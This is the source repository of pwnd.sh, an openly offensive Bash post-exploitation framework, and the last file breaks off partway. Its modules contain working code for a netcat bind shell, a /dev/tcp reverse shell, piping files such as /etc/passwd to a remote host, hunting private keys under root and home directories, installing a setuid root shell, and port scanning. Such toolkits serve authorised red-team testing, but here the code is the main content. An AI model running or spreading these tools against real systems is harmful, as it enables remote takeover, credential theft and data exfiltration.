[ { "path": "LICENSE", "content": "Copyright (c) 2016, SafeBreach\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." }, { "path": "README.rst", "content": "PWND.SH\n=======\n\npwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) and with little to no external dependencies.\n\nSlides from SkyDogCon 2016 are `available here `_\n\n\nInstall:\n--------\n\n.. code::\n\n $ cd bin/\n $ ./compile_pwnd_sh.sh\n\nThis will generate a file called ``pwnd.sh``\n\n.. code::\n\n $ ls -la pwnd.sh\n -rw-r--r--@ 1 ikotler staff 7823 Oct 19 16:55 pwnd.sh\n\nNow let's get pwnd!\n\n.. code::\n\n $ source pwnd.sh\n Pwnd v1.0.0, Itzik Kotler (@itzikkotler)]\n Type `help' to display all the pwnd commands.\n Type `help name' to find out more about the pwnd command `name'.\n\n (pwnd)$\n\nTested:\n-------\n\n* Mac OS X El Captian (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)\n* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)\n* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)\n\nFeatures/Bugs:\n--------------\n\nFound a bug? Have a good idea for improving PWND.SH? Head over to `PWND.SH's github `_ page and create a new ticket or fork. If you want to contact us please email: labs (at) safebreach (dot) com.\n\nLicense:\n--------\n\nBSD 3-Clause\n" }, { "path": "bin/compile_pwnd_sh.sh", "content": "#!/usr/bin/env bash\n\n###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n##########\n# Consts #\n##########\n\nDEFAULT_OUTPUT_FILENAME=\"pwnd.sh\"\n\n\n#############\n# Functions #\n#############\n\nnormalize_and_append() {\n\tgrep -v \"^#\" < \"$1\" >> \"$2\"\n\techo \" \" >> \"$2\"\n}\n\n\n###############\n# Entry Point #\n###############\n\noutput_filename=\"$DEFAULT_OUTPUT_FILENAME\"\n\nif [ ! -z \"${1-}\" ]; then\n output_filename=\"$1\"\nfi\n\n# Start with a shebang line\necho \"#!/usr/bin/env bash\"> \"$output_filename\"\n\nnormalize_and_append \"../pwnd/_pwnd.bash\" \"$output_filename\"\n\nfor module in $(find ../pwnd -type f -name \"[a-zA-Z0-9]*.bash\"); do\n normalize_and_append \"$module\" \"$output_filename\"\ndone\n\nnormalize_and_append \"../pwnd/_bootstrap.bash\" \"$output_filename\"\n\nls -la \"$output_filename\"\n" }, { "path": "bin/pwnd.sh", "content": "#!/usr/bin/env bash\n\nIFS=$' \\t\\n'\n\n\nPWND_VERSION=\"1.0.0\"\n\n\n\n_pwnd_commands=()\n\n\n\npwnd_register_cmd() {\n\t_pwnd_commands+=(\"$1;$2\")\n}\n\n\npwnd_isroot() {\n local retval=0\n if [ $EUID -ne 0 ]; then\n echo \"You must be a root user\"\n retval=1\n fi\n return $retval\n}\n \n\n\n__hunt_privkeys_usage() {\n cat << \"EOF\"\nusage: __hunt_privkeys [dir ...]\n Find all private keys that are textaully encoded. Each DIR argument will be\n recursively searched. Default directories are: `~root' and `dirname $HOME'\nEOF\n return 0\n}\n\n\nhunt_privkeys() {\n\n local dirs\n\n if [ $# -eq 0 ]; then\n dirs=(~root \"$(dirname $HOME)\")\n else\n dirs=(\"$@\")\n fi\n\n for directory in \"${dirs[@]}\"; do\n echo \"Scanning $directory ...\"\n grep -ril \"PRIVATE KEY\" \"$directory\" 2> /dev/null\n done\n\n echo \"Done!\"\n\n}\n\npwnd_register_cmd hunt_privkeys \"Find all private keys that are textually encoded\"\n \n\n\n__bindshell_usage() {\n cat << \"EOF\"\nusage: bindshell port [arg ...]\n A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo\n and bash. PORT is a TCP (by default) port number. Each ARG will be passed\n directly to nc\nEOF\n return 0\n}\n\n\nbindshell() {\n if [ -z \"${1-}\" ]; then\n \t __bindshell_usage\n return 0\n fi\n\n local tempfile=$(mktemp -u)\n local port=\"$1\"\n mkfifo \"$tempfile\"\n bash -i 2>&1 < \"$tempfile\" | nc \"${@:2}\" -l \"$port\" > \"$tempfile\"\n}\n\npwnd_register_cmd bindshell \"A simple yet \\\"cross platform\\\" implementation of bindshell using nc, mkfifo and bash\"\n \n\n\n__reverseshell_usage() {\n cat << \"EOF\"\nusage: reverseshell [-u] host port\n A simple yet \"cross platform\" implementation of reverseshell using bash\n sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)\n port number. The `-u' if specified says use UDP instead of the default option\n of TCP.\nEOF\n return 0\n}\n\n\nreverseshell() {\n local host proto port\n\n if [ \"${1-}\" == \"-u\" ]; then\n if [ -z \"${3-}\" ]; then\n \t __reverseshell_usage\n return 0\n fi\n host=\"$2\"\n proto=\"udp\"\n port=\"$3\"\n else\n if [ -z \"${2-}\" ]; then\n __reverseshell_usage\n return 0\n fi\n proto=\"tcp\"\n port=\"$2\"\n host=\"$1\"\n fi\n\n bash -i >& \"/dev/$proto/$host/$port\" 0>&1\n}\n\npwnd_register_cmd reverseshell \"A simple yet \\\"cross platform\\\" implementation of reverseshell using bash sockets\"\n \n\n\n__over_socket_usage() {\n cat << \"EOF\"\nusage: over_socket [-u] host port\n A simple yet \"cross platform\" implementation of generic TCP and UDP socket\n using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP\n (by default) port number. The `-u' if specified says use UDP instead of\n the default option of TCP.\n\n Example:\n\n $ cat /etc/passwd | over_socket localhost 80\n\n This will open connection to localhost at port 80 TCP and will send over\n the content of `/etc/passwd'\nEOF\n return 0\n}\n\n\nover_socket() {\n local host proto port\n\n if [ \"${1-}\" == \"-u\" ]; then\n if [ -z \"${3-}\" ]; then\n \t __over_socket_usage\n return 0\n fi\n host=\"$2\"\n proto=\"udp\"\n port=\"$3\"\n else\n if [ -z \"${2-}\" ]; then\n __over_socket_usage\n return 0\n fi\n proto=\"tcp\"\n port=\"$2\"\n host=\"$1\"\n fi\n\n cat /dev/stdin > \"/dev/$proto/$host/$port\"\n}\n\npwnd_register_cmd over_socket \"A simple yet \\\"cross platform\\\" implementation of generic TCP and UDP socket using bash sockets\"\n \n\n\n__install_rootshell_usage() {\n cat << \"EOF\"\nusage: install_rootshell [/path/to/shell] [/path/to/rootshell]\n A simple yet \"cross platform\" implementation of rootshell using chmod and\n bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL\n is path to where to install the rootshell (default: mktemp -u)\nEOF\n return 0\n}\n\n\ninstall_rootshell() {\n pwnd_isroot || return 1\n\n local shellfile=${1-$SHELL}\n local rootshell=${2-$(mktemp -u)}\n\n cp \"$shellfile\" \"$rootshell\"\n chmod u+s \"$rootshell\"\n ls -la \"$rootshell\"\n}\n\npwnd_register_cmd install_rootshell \"A simple yet \\\"cross platform\\\" implementation of rootshell using \\`chmod u+s' and bash\"\n \n\n\n__portscanner_usage() {\n cat << \"EOF\"\nusage: portscanner host [port/proto ...], [port-range/proto ...]>\n A simple yet \"cross platform\" implementation of portscanner using bash\n sockets. HOST can be IPv4 address or hostname. PORT can be any port number.\n PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is\n any range between 1 to 65535 following `/tcp' or `/udp' postfix.\n\n Examples:\n\n $ portscanner localhost 80/tcp\n\n This will check if TCP port 80 is open on localhost.\n\n $ portscanner localhost 53/tcp,53/udp\n\n This will check if TCP port 53 and UDP port 53 are opened on localhost.\n\n $ portscanner localhost 1-1024/tcp,69/udp\n\n This will check if TCP ports 1 to 1024 are opened and if UDP port 69\n is opened on localhost.\nEOF\n return 0\n}\n\n\n__portscanner_timeout() {\n # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time\n `perl -e 'alarm shift; open STDERR, \"> /dev/null\"; exec @ARGV' \"$@\"`\n # `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process\n}\n\n\nportscanner() {\n if [ -z \"${2-}\" ]; then\n __portscanner_usage\n return\n fi\n\n local host=\"$1\"\n local ports=()\n local csv_args=()\n\n IFS=',' read -ra csv_args <<< \"${@:2}\"\n\n for arg in \"${csv_args[@]}\"; do\n case \"$arg\" in\n *-*)\n # i.e. 1-1024/tc\n local range_ports=()\n IFS='/' read -ra range_ports <<< \"$arg\"\n IFS='-' read start end <<< \"${range_ports[0]}\"\n for ((port=start; port <= end; port++)); do\n ports+=(\"$port/${range_ports[1]}\")\n done\n ;;\n *,*)\n # i.e. '53/tcp, 53/udp'\n IFS=',' read -ra ports <<< \"$arg\"\n ;;\n *)\n # i.e. '80/tcp'\n ports+=(\"$arg\")\n ;;\n esac\n done\n\n for port in \"${ports[@]}\"; do\n local conn_parameter=()\n IFS='/' read -ra conn_parameter <<< \"$port\"\n __portscanner_timeout 1 \"echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}\" &&\n echo \"port $port is open\" ||\n echo \"port $port is closed\"\n done\n\n}\n\npwnd_register_cmd portscanner \"A simple yet \\\"cross platform\\\" implementation of TCP and UDP port scanner using bash sockets\"\n \n\n\n__bash_help_usage() {\n echo \"Execute bash builtin help and pass any argument to it\"\n}\n\n\nbash_help() {\n local help_topic=\"\"\n\n if [ ! -z \"${1-}\" ]; then\n help_topic=\"$1\"\n fi\n\n bash -c \"help $help_topic\"\n}\n\n\n__help_usage() {\n cat << \"EOF\"\nusage: pwnd-help \n Display helpful information about pwnd commands. If NAME is specified,\n gives detailed help on command NAME, otherwise a list of the pwnd commands\n is printed.\n\n To access bash builtin help use: `bash_help'\nEOF\n\n return 0\n}\n\n\nhelp() {\n if [ ! -z \"${1-}\" ]; then\n eval \"__$1_usage\" 2> /dev/null\n if [ $? == 127 ]; then\n\t echo \"pwnd-help: no help topics match \\`$1'. Try \\`help' to see all the defined commands\"\n\t return 127\n\t fi\n else\n cat << EOF\npwnd, version ${PWND_VERSION} (${MACHTYPE})\nThese pwnd commands are defined internally. Type \\`help' to see this list.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n for pwnd_command in \"${_pwnd_commands[@]-}\"; do\n IFS=';' read -ra pwnd_cmd_parameters <<< \"$pwnd_command\"\n # IFS=';' pwnd_cmd_parameters=($pwnd_command)\n printf \"%-19s -- %s\\n\" \"${pwnd_cmd_parameters[0]}\" \"${pwnd_cmd_parameters[1]}\"\n done\n fi\n}\n\n\n\ncat << EOF\n[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]\"\nType \\`help' to display all the pwnd commands.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n\nPS1=\"(\\[\\033[92m\\]\\[\\033[1m\\]pwnd\\[\\033[0m\\]\\[\\033[39m\\])${PS1-}\"\n \n" }, { "path": "pwnd/_bootstrap.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# _bootstrap.sh, interactive pwnd shell\n\n__bash_help_usage() {\n echo \"Execute bash builtin help and pass any argument to it\"\n}\n\n\nbash_help() {\n local help_topic=\"\"\n\n if [ ! -z \"${1-}\" ]; then\n help_topic=\"$1\"\n fi\n\n bash -c \"help $help_topic\"\n}\n\n\n__help_usage() {\n cat << \"EOF\"\nusage: pwnd-help \n Display helpful information about pwnd commands. If NAME is specified,\n gives detailed help on command NAME, otherwise a list of the pwnd commands\n is printed.\n\n To access bash builtin help use: `bash_help'\nEOF\n\n return 0\n}\n\n\nhelp() {\n if [ ! -z \"${1-}\" ]; then\n eval \"__$1_usage\" 2> /dev/null\n if [ $? == 127 ]; then\n\t echo \"pwnd-help: no help topics match \\`$1'. Try \\`help' to see all the defined commands\"\n\t return 127\n\t fi\n else\n cat << EOF\npwnd, version ${PWND_VERSION} (${MACHTYPE})\nThese pwnd commands are defined internally. Type \\`help' to see this list.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n for pwnd_command in \"${_pwnd_commands[@]-}\"; do\n IFS=';' read -ra pwnd_cmd_parameters <<< \"$pwnd_command\"\n # IFS=';' pwnd_cmd_parameters=($pwnd_command)\n printf \"%-19s -- %s\\n\" \"${pwnd_cmd_parameters[0]}\" \"${pwnd_cmd_parameters[1]}\"\n done\n fi\n}\n\n\n###############\n# Entry Point #\n###############\n\ncat << EOF\n[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]\"\nType \\`help' to display all the pwnd commands.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n\nPS1=\"(\\[\\033[92m\\]\\[\\033[1m\\]pwnd\\[\\033[0m\\]\\[\\033[39m\\])${PS1-}\"\n" }, { "path": "pwnd/_pwnd.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\nIFS=$' \\t\\n'\n\n##########\n# Consts #\n##########\n\nPWND_VERSION=\"1.0.0\"\n\n\n####################\n# Global variables #\n####################\n\n_pwnd_commands=()\n\n\n#############\n# Functions #\n#############\n\npwnd_register_cmd() {\n\t_pwnd_commands+=(\"$1;$2\")\n}\n\n\npwnd_isroot() {\n local retval=0\n if [ $EUID -ne 0 ]; then\n echo \"You must be a root user\"\n retval=1\n fi\n return $retval\n}\n" }, { "path": "pwnd/assets/priv_keys.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# priv_keys, Find all private keys that are textually encoded\n\n__hunt_privkeys_usage() {\n cat << \"EOF\"\nusage: __hunt_privkeys [dir ...]\n Find all private keys that are textaully encoded. Each DIR argument will be\n recursively searched. Default directories are: `~root' and `dirname $HOME'\nEOF\n return 0\n}\n\n\nhunt_privkeys() {\n\n local dirs\n\n if [ $# -eq 0 ]; then\n dirs=(~root \"$(dirname $HOME)\")\n else\n dirs=(\"$@\")\n fi\n\n for directory in \"${dirs[@]}\"; do\n echo \"Scanning $directory ...\"\n grep -ril \"PRIVATE KEY\" \"$directory\" 2> /dev/null\n done\n\n echo \"Done!\"\n\n}\n\npwnd_register_cmd hunt_privkeys \"Find all private keys that are textually encoded\"\n" }, { "path": "pwnd/c2/bindshell.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# bindshell, A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and /bin/bash\n\n__bindshell_usage() {\n cat << \"EOF\"\nusage: bindshell port [arg ...]\n A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo\n and bash. PORT is a TCP (by default) port number. Each ARG will be passed\n directly to nc\nEOF\n return 0\n}\n\n\nbindshell() {\n if [ -z \"${1-}\" ]; then\n \t __bindshell_usage\n return 0\n fi\n\n local tempfile=$(mktemp -u)\n local port=\"$1\"\n mkfifo \"$tempfile\"\n bash -i 2>&1 < \"$tempfile\" | nc \"${@:2}\" -l \"$port\" > \"$tempfile\"\n}\n\npwnd_register_cmd bindshell \"A simple yet \\\"cross platform\\\" implementation of bindshell using nc, mkfifo and bash\"\n" }, { "path": "pwnd/c2/reverseshell.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# reverseshell, A simple yet \"cross platform\" implementation of reverseshell using bash sockets\n\n__reverseshell_usage() {\n cat << \"EOF\"\nusage: reverseshell [-u] host port\n A simple yet \"cross platform\" implementation of reverseshell using bash\n sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)\n port number. The `-u' if specified says use UDP instead of the default option\n of TCP.\nEOF\n return 0\n}\n\n\nreverseshell() {\n local host proto port\n\n if [ \"${1-}\" == \"-u\" ]; then\n if [ -z \"${3-}\" ]; then\n \t __reverseshell_usage\n return 0\n fi\n host=\"$2\"\n proto=\"udp\"\n port=\"$3\"\n else\n if [ -z \"${2-}\" ]; then\n __reverseshell_usage\n return 0\n fi\n proto=\"tcp\"\n port=\"$2\"\n host=\"$1\"\n fi\n\n bash -i >& \"/dev/$proto/$host/$port\" 0>&1\n}\n\npwnd_register_cmd reverseshell \"A simple yet \\\"cross platform\\\" implementation of reverseshell using bash sockets\"\n" }, { "path": "pwnd/exfiltration/over_socket.bash", "content": "###########################################################################\n# #\n# Copyright (c) 2016, SafeBreach #\n# All rights reserved. #\n# #\n# Redistribution and use in source and binary forms, with or without #\n# modification, are permitted provided that the following conditions are #\n# met: #\n# #\n# 1. Redistributions of source code must retain the above #\n# copyright notice, this list of conditions and the following #\n# disclaimer. #\n# #\n# 2. Redistributions in binary form must reproduce the #\n# above copyright notice, this list of conditions and the following #\n# disclaimer in the documentation and/or other materials provided with #\n# the distribution. #\n# #\n# 3. Neither the name of the copyright holder #\n# nor the names of its contributors may be used to endorse or promote #\n# products derived from this software without specific prior written #\n# permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #\n# #\n###########################################################################\n\n# over_socket, A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets\n\n__over_socket_usage() {\n cat << \"EOF\"\nusage: over_socket [-u] host port\n A simple yet \"cross platform\" implementation of generic TCP and UDP socket\n using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP\n (by default) port number. The `-u' if specified says use UDP instead of\n the default option of TCP.\n\n Example:\n\n $ cat /etc/passwd | over_socket localhost 80\n\n This will open connection to 